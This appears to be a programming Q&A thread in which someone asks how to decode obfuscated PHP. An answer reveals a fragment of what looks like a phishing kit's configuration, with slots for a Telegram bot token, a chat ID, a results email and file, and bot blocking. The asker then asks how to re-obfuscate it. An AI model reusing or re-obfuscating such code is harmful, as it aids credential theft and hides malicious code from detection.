# How to decode this goto

Tags: php, decode, goto, decoder

What is this numbers name ?hash or what is this ?

header("\110\124\124\x50\x2f\x31\x2e\x30\40\x34\60\x34\x20\x4e\x6f\164\40\106\157\x75\156\144");
How to decode this values of numbers?
`goto S_O42; cZvRL: echo $MxiEw["\x61\160\151"]; goto NPM4C; PpDWs: header("\114\x6f\x63\x61\164\x69\x6f\156\x3a\x20\151\x6e\x64\145\170\x2e\160\150\160"); goto u1Nkz; vmCBP: $CxSlv = "\73\x59\x6f\165\x72\40\x62\x6f\164\x20\x74\157\153\x65\x6e\x20\150\x65\x72\145\xd\xa\142\x6f\x74\75\42\x25\x73\x22\xd\12\x3b\131\157\165\x72\40\x43\x68\141\x74\x20\x49\x64\40\x68\x65\162\x65\xd\xa\x63\150\x61\x74\75\x22\45\163\x22\15\12\x3b\x4e\141\155\x65\x20\131\x6f\165\40\x63\x61\156\40\x63\150\141\156\147\x65\x20\x79\x6f\x75\x72\40\156\141\155\145\x20\150\x65\162\145\xd\12\156\141\x6d\x65\75\x22\45\163\x22\15\xa\73\x79\157\165\x72\x20\x61\144\x6d\151\x6e\x20\x70\x61\x6e\x65\x6c\x20\x70\x61\x73\163\167\x6f\x72\x64\xd\xa\x70\x61\x73\163\x77\157\162\x64\x3d\42\x25\x73\42\15\xa\x3b\131\x6f\x75\x72\x20\x65\x6d\x61\x69\x6c\x20\146\x6f\x72\40\162\145\163\x75\154\164\163\x20\x68\x65\x72\x65\xd\xa\x65\x6d\x61\x69\x6c\75\47\x25\163\47\x3b\xd\12\73\x59\x6f\165\x72\x20\122\x65\144\151\x72\x65\143\x74\x20\x55\x72\x6c\x20\110\145\x72\x65\15\12\146\151\156\151\x73\150\x3d\x22\x25\163\42\xd\12\x3b\124\157\x20\x73\145\x6e\144\x20\x76\x69\163\151\x74\163\40\x6f\162\x20\x6e\x6f\164\40\x31\57\60\xd\xa\163\145\156\x64\x5f\166\x69\163\x69\164\x3d\x22\45\163\x22\15\12\73\124\x6f\40\142\154\x6f\x63\x6b\x20\x6d\x69\x63\x72\157\163\157\146\164\x20\142\x6f\164\x20\163\x65\x74\x20\x74\157\x20\x31\xd\xa\x62\154\157\x63\153\x5f\x62\157\164\x3d\x22\x25\163\x22\xd\xa\73\x59\157\165\162\x20\146\x69\154\145\x20\156\141\155\x65\x20\164\x6f\40\x73\141\x76\145\40\x79\157\x75\x72\40\162\x65\163\165\154\164\163\xd\12\x72\145\x73\x75\154\164\163\137\x66\151\154\x65\75\x22\x25\163\42\xd\xa\x3b\131\x6f\165\162\x20\141\x70\151\40\x6b\145\171\40\150\145\162\145\54\171\157\165\x20\x63\x61\156\x20\x67\145\164\40\157\x6e\145\x20\146\x72\x6f\155\x20\x40\146\x69\163\150\145\162\163\164\x65\154\154\xd\12\x61\x70\x69\75\x22\45\x73\42"; goto tOWu2; S_O42: session_start(); goto jMp2A; zyGHZ: Ozg5B: goto lH6gN; rcshr: echo $MxiEw["\x62\x6f\164"]; goto yQqSY; TmRKR: if (!(isset($_POST["\x62\157\164"]) && isset($_POST["\160\141\163\163\x77\157\162\x64"])`

How to decode this values

Comment: It's character codes, made to be hard to read by human. Most likely it's malicious content and should be deleted. Simply do `echo "\110\124\124\x50\x2f\x31\x2e\x30\40\x34\60\x34\x20\x4e\x6f\164\40\106\157\x75\156\144";` to get content

Answer (score 0):

You can get content by outputting that each sequence of character codes (just escape all `$`):

```php
echo <<<FOO
header("\110\124\124\x50\x2f\x31\x2e\x30\40\x34\60\x34\x20\x4e\x6f\164\40\106\157\x75\156\144");
...
FOO;
```

// Output

```php
header("HTTP/1.0 404 Not Found");
goto S_O42;
cZvRL: echo $MxiEw["api"];
goto NPM4C;
PpDWs: header("Location: index.php");
goto u1Nkz;
vmCBP: $CxSlv = ";Your bot token here
bot="%s"
;Your Chat Id here
chat="%s"
;Name You can change your name here
name="%s"
;your admin panel password
password="%s"
;Your email for results here
email='%s';
;Your Redirect Url Here
finish="%s"
;To send visits or not 1/0
send_visit="%s"
;To block microsoft bot set to 1
block_bot="%s"
;Your file name to save your results
results_file="%s"
;Your api key here,you can get one from @fisherstell
api="%s"";
goto tOWu2;
S_O42: session_start();
goto jMp2A;
zyGHZ: Ozg5B: goto lH6gN;
rcshr: echo $MxiEw["bot"];
goto yQqSY;
TmRKR: if (!(isset($_POST["bot"]) && isset($_POST["password"])
```

Comment: And how to back encode into same encoder ! Goto and Base

Comment: @Lukemos Something like [this](https://stackoverflow.com/questions/10092885/encode-a-string-into-character-codes)